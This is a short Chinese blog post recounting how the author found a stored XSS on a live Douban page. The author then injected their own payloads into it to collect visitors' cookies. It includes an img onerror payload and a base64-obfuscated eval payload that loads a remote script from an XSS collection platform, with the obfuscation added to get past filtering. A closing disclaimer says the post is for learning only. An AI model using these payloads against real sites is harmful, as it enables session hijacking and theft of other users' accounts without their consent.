0x00 緣起
2/19晚上十點左右,我在這一天”忙碌”的網課生活中解放出來。因爲傍晚挖到聯想的漏洞,想着既然它們在漏洞盒子有項目那麼應該有自己的應急響應平臺吧。
然後我嘗試百度:聯想應急響應
我一個個的打開,當我打開豆瓣的網站時。怦然心動;是這樣的
以我的驚天地泣鬼神的反應力,直接梭哈提交漏洞盒子。
0x01 XSS因
我開始挖掘這個xss是如何產生的,一個快捷鍵:Ctrl + U打開了前端源代碼查看
因爲xss的彈窗無非就是alert(),confirm()和prompt()
我就本着習慣先去查看了alert
很快就找到了罪魁語句:
<img src=\"x\" οnerrοr=\"alert('hello')\">然後我回到前端,查看是哪個用戶插入的語句
開啓我的F12,裝逼功能(當然不是修改頁面哈)
找到了真正的大佬
0x02 XSS果
我也滿足一下自己的b格,給自己彈了一個b話十足的句子
於是呢,我就想着去xsspt創建項目,這樣有人打開我就能梭哈一波了。
<img src=" https://xsspt.com/****** " οnerrοr="alert('我是帥哥南方')">
當我插入的時候重新訪問網站時候,平臺並沒有接收到我的cookie
我就想着是不是過濾了,於是呢
<img src=x οnerrοr=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPSdodHRwczovL3hzc3B0LmNvbS93UU5qUE4/JytNYXRoLnJhbmRvbSgp'))>
我們可以對自己的payload做些手腳
然後插入,刷新。
說明:
文章僅用於思路方法學習,請勿用於非法用途